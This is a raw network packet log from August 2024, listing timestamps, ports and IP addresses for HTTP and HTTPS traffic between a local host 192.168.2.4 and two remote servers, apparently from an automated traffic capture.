Aug 10, 2024 16:12:25.459863901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459887981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459904909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459914923 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.459918022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459933043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459942102 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.459947109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459964037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.459975004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.459979057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.459986925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460000992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460010052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460016966 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460021019 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460031986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460036039 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460047960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460053921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460062027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460067987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460076094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460083961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460099936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460109949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460174084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460298061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460311890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460330009 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460335016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460345030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460349083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460362911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460365057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460378885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460391045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460393906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.460407972 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460417032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.460431099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.465773106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465787888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465802908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465822935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.465847969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.465934992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465949059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465976954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465980053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.465991020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.465996981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466005087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466017008 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466018915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466032028 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466033936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466042995 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466046095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466061115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466069937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466073990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466084957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466087103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466099024 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466101885 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466113091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466120958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466128111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466129065 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466142893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466146946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466157913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466161013 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466172934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466178894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466187000 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466192007 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466206074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466213942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466226101 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466228962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466243029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466260910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466269970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466284037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466296911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466299057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466312885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466325045 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466326952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466345072 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466347933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466368914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466370106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466382980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466394901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466398001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466403961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466411114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466424942 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466427088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.466434002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466454029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.466464996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489655018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489670038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489685059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489698887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489715099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489716053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489737034 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489761114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489901066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489914894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489929914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489943027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489958048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489963055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489963055 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.489972115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.489998102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490011930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490025997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490039110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490052938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490052938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490052938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490052938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490053892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490068913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490083933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490089893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490089893 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490107059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490123034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490135908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490160942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490175009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490190983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490205050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490205050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490205050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490205050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490206957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490220070 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490235090 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490238905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490247011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490252018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490267038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490330935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490330935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490330935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490358114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490371943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490386963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490436077 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490451097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490464926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490478039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490493059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490519047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490519047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490549088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490562916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490576029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490606070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490622044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490636110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490648985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490648985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490648985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490648985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490653038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490657091 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490712881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490725994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490741968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490742922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490742922 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490804911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490804911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490807056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490820885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490834951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490852118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490868092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490911007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490911007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490911007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490911007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.490931034 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490945101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.490958929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491045952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491045952 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491072893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491094112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491117001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491131067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491132021 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491144896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491159916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491166115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491183996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491198063 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491219997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491235971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491235971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491235971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491235971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491242886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491257906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491270065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491283894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491285086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491297960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491311073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491326094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491341114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491345882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491345882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491345882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491358995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491374016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491374969 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491388083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491395950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491410017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491415977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491415977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491425037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491439104 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491441965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491456985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491472006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491492033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491492987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491492987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491492987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491492987 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491506100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491519928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.491661072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.491661072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.492089987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492104053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492119074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492177963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492183924 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.492192984 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492208958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492224932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.492278099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.492278099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.492278099 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.492954969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493007898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493063927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493087053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493102074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493115902 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493130922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493146896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493172884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493172884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493172884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493172884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493199110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493202925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493215084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493228912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493244886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493258953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493273020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493298054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493298054 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493376970 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493417025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493431091 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493444920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493472099 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493484974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493499994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493515015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493525982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493525982 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493572950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493572950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493613005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493628025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493643045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493658066 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493674040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493688107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493709087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.493742943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493742943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493742943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.493742943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.496367931 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.496383905 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.496506929 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.496512890 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.497575045 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.502620935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502662897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502679110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502692938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502708912 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502726078 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.502732038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.502746105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.502758026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.503823042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.503866911 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.520936012 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.520951986 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.520989895 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521002054 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521008015 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521030903 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521044016 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521048069 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521086931 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521166086 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521214962 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521255970 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521260023 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.521272898 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.521312952 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.527646065 CEST	443	49754	162.159.130.233	192.168.2.4
